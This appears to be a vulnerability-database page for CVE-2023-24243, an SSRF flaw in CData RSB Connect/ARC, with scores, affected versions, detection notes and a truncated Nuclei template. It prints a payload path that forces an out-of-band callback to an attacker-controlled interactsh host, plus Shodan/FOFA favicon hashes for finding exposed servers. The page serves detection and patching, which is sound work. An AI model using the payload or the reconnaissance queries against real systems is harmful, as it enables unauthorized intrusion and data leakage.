CVE-2023-24243
published 2023-06-16CVE-2023-24243: CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).
PriorityP353high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
4.00%
89.2th percentile
CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cdata | arc | < 22.0.8473 | 22.0.8473 |
Detection & IOCsextracted from sources · hover to see the quote
url{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb
otherhttp.favicon.hash:163538942
othericon_hash="163538942"
- →SSRF exploit path uses double URL-encoded backslashes (%255c%255c) to trigger a UNC-style path traversal to an attacker-controlled host; detect outbound SMB/DNS callbacks from the server following requests matching this pattern.
- →Successful exploitation results in an HTTP 404 response from the target while a DNS interaction is observed on the attacker-controlled interactsh server; correlate 404 responses on this path with out-of-band DNS callbacks.
- →Identify exposed CData ARC/RSB Connect instances using Shodan favicon hash 163538942 or FOFA icon_hash query as a pre-exploitation reconnaissance indicator.
- ·The Nuclei template requires an active interactsh (out-of-band) server to confirm exploitation; DNS callback detection is the primary confirmation mechanism, meaning purely passive/inline detection will not catch this SSRF without OOB infrastructure.
- ·The vulnerability affects specifically CData RSB Connect v22.0.8336; the CPE wildcard in the template (cpe:2.3:a:cdata:arc:*) means version-agnostic scanning may produce false positives on patched versions. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
CData RSB Connect v22.0.8336 - Server Side Request Forgery
nuclei·CVSS 7.5
CVE-2023-24243 [HIGH] CData RSB Connect v22.0.8336 - Server Side Request Forgery
CData RSB Connect v22.0.8336 - Server Side Request Forgery
CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).
Template:
id: CVE-2023-24243
info:
name: CData RSB Connect v22.0.8336 - Server Side Request Forgery
author: ritikchaddha
severity: high
description: |
CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).
impact: |
Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the server, potentially leading to unauthorized access or data leakage.
remediation: |
Apply the latest security patches or updates provided by CData to fix the SSRF vulnerability in RSB Connect v22.0.8336.
reference:
- https://twitter.com/W01fh4cker/status/1669890019191037952
- https://
No writeups or analysis indexed.
https://arc.cdata.com/https://arc.cdata.com/trial/https://gist.github.com/d3vc0r3/6460a5f006e32a2ebffe739e411ab1b8https://www.cdata.com/kb/entries/netembeddedserver-notice.rsthttps://arc.cdata.com/https://arc.cdata.com/trial/https://gist.github.com/d3vc0r3/6460a5f006e32a2ebffe739e411ab1b8https://www.cdata.com/kb/entries/netembeddedserver-notice.rst
2023-06-16
Published